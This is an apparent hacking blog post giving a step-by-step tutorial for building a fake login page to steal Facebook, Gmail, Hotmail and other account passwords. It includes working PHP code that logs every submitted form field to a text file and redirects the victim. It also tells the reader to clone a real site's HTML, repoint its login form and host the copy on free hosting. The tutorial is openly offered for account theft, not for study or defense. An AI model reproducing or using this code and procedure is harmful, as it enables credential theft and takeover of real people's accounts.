• Latest sXe Hacks

  • Other Pc games hacks

  • Counter strike Servers

  • creator of this site: Haris


HOW TO CREATE A PHISHING PAGE(FAKE LOGIN PAGE)


You can hack facebook , gmail , hotmail or any other account with the help of phishing page.

Follow these steps for create phishing page for any website:-

Step 1:- First of all open the Website in your browser for which you want to create Phishing page.

Step 2:- After open of the website copy the source code of website by right click on page and save to any name with “.html” extension.I prefer you to save the file as index.html.

Step 3:- Now open a new notepad and paste the below code and change the “http://www.redirectwebsite.com” to the address which you want to redirect the user after entering of user name and password.Save this file to any name with “.php” extension. Suppose we save it as cheater.php.
NOTE: Pass.txt is our database where the details are stored.

<?php
  header ('Location: http://www.redirectwebsite.com');
  $handle = fopen("pass.txt", "a");
  foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
    fwrite($handle, "=");
     fwrite($handle, $value);
     fwrite($handle, "rn");
  }
  fwrite($handle, "rn");
  fclose($handle);
  exit;
  ?>

OR you can download the cheater.php file from HERE

Step 4:- Open another new notepad file and save empty notepad to “pass.txt”.

Step 5:- Now Open the Source Code (Saved in step 2) and find the action tag and replace the address with .php(the file which we make in step 3) and save the file.
In Case of facebook phishing page action tag is facebook.com/login.php?login_attempt=1

Step 6:- Now we have create three file. Now upload all three files on the the free hosting site.

Step 7:- After uploading these 3 files, open your registered website(which you have registered on a free web hosting service) and enter fake user details to check. and open the pass.txt file(view it from the web hosting panel,on which you have uploaded pass.txt file) if you see the entered details here than all thing is done and if not than check all step again.


If you face any problem than feel free to comment below.

1 comment:

Anonymous said...

dear how to save source code of facebook and dear

Post a Comment